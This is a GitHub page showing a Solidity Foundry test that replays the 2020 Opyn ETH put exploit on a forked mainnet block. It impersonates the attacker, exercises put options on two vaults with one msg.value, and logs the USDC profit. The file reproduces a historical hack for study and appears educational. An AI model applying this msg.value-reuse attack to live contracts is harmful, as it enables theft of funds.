forked from zhouxianyuan/DeFiHackLabs
-
Notifications
You must be signed in to change notification settings - Fork 2
/
Opyn.exp.sol
58 lines (40 loc) · 1.88 KB
/
Opyn.exp.sol
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
// SPDX-License-Identifier: UNLICENSED
pragma solidity 0.8.17;
import "forge-std/Test.sol";
import "./interface.sol";
/*
@Analysis
https://medium.com/opyn/opyn-eth-put-exploit-post-mortem-1a009e3347a8
@Transaction
0x56de6c4bd906ee0c067a332e64966db8b1e866c7965c044163a503de6ee6552a
*/
contract ContractTest is DSTest {
IOpyn opyn = IOpyn(0x951D51bAeFb72319d9FBE941E1615938d89ABfe2);
address attacker = 0xe7870231992Ab4b1A01814FA0A599115FE94203f;
CheatCodes cheats = CheatCodes(0x7109709ECfa91a80626fF3989D68f67F5b1DD12D);
IUSDC usdc = IUSDC(0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48);
function setUp() public {
cheats.createSelectFork("mainnet", 10592516); //fork mainnet at block 10592516
}
function test_attack() public {
cheats.startPrank(attacker);
uint balBefore = usdc.balanceOf(attacker) / 1e6;
console.log("Attacker USDC balance before is ", balBefore);
console.log("------EXPLOIT-----");
//Adds ERC20 collateral, and mints new oTokens in one step
uint amtToCreate = 300000000;
uint amtCollateral = 9900000000;
opyn.addERC20CollateralOption(amtToCreate, amtCollateral, attacker);
//create an arry of vaults
address payable[] memory _arr = new address payable[](2) ;
_arr[0] = payable(0xe7870231992Ab4b1A01814FA0A599115FE94203f);
_arr[1] = payable(0x01BDb7Ada61C82E951b9eD9F0d312DC9Af0ba0f2);
//The attacker excercises the put option on two different valuts using the same msg.value
opyn.exercise{value: 30 ether}(600000000, _arr);
//remove share of underlying after excercise
opyn.removeUnderlying();
uint balAfter = usdc.balanceOf(attacker) / 1e6;
console.log("Attacker USDC balance after is ", balAfter);
console.log("Attacker profit is ", balAfter - balBefore);
}
}